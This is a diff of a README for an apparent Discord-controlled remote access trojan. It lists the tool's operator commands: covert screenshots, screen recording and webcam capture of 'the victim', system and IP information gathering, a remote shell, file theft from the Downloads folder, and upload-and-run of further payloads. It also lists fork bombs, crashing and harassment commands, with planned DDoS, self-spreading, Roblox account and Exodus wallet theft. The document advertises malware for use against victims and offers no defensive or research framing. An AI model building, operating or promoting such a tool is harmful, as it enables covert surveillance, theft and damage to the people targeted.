syntheticlol/Discord-RAT/README.md

 Remote Desktop:

-  screenshot: Takes a screenshot of the user's PC
-  record: Records the user's screen for 30 seconds
-  webcam: Captures a picture from the user's webcam
+  .screenshot <sessionkey>: Takes a screenshot of the user's PC .record <sessionkey>: Records the user's screen for 30 seconds .webcam <sessionkey>: Captures a picture from the user's webcam

 ------------------------------------------------------------------------------------------

 Information Gathering:

-  time: Retrieves the user's date and time
-  Ipinfo: Retrieves the user's IP information
-  sysinfo: Retrieves the user's system information
-  usage: Tells you the users disk and cpu usage
+  .time <sessionkey>: Retrieves the user's date and time .Ipinfo <sessionkey>: Retrieves the user's IP information .sysinfo <sessionkey>: Retrieves the user's system information .usage <sessionkey>: Tells you the users disk and cpu usage

 ------------------------------------------------------------------------------------------

 Remote Shell Commands:

-  shell <session> <command>: Executes a command on the victim's computer
+  .shell <session> <command>: Executes a command on the victim's computer

 ------------------------------------------------------------------------------------------

 File Management:

-  website: Sends the user to a website of choice
-  getdownloads: Gets all Users files in downloads folder
-  download: Can download any file in their downloads folder
+  .website <sessionkey> <https://example.com>: Sends the user to a website of choice .getdownloads <sessionkey>: Gets all Users files in downloads folder .download <sessionkey>: Can download any file in their downloads folder

 ------------------------------------------------------------------------------------------

 System Control:

-  restart: Restarts the user's computer
-  shutdown: Shuts down the user's computer
+  .restart <sessionkey>: Restarts the user's computer .shutdown <sessionkey>: Shuts down the user's computer

 ------------------------------------------------------------------------------------------

 Malware Commands

-  upload <session> <filelink>: Uploads and downloads file and then runs it on victims pc startup <session>: puts the current file on startup
+  .upload <session> <filelink>: Uploads and downloads file and then runs it on victims pc .startup <session>: COMING SOON
+  .ddos <website>: COMING SOON
+  .spread <session>: COMING SOON
+  .roblox <session>: COMING SOON
+  .exodus <session>: COMING SOON

 ------------------------------------------------------------------------------------------

 Troll Commands:

-  furryporn <session>: this spams furry porn browsers on victims browser to flood their history fork <session>: forkbombs their computer using simple batch script rickroll <session>: rickrolls their computer for 30 seconds and they cannot escape music <session> <file_attachment>: plays music on their computer bluescreen <session>: bluescreens victims pc
+  .furryporn <session>: this spams furry porn browsers on victims browser to flood their history .fork <session>: forkbombs their computer using simple batch script .rickroll <session>: rickrolls their computer for 30 seconds and they cannot escape .music <session> <file_attachment>: plays music on their computer .bluescreen <session>: COMING SOON

 ------------------------------------------------------------------------------------------
 ```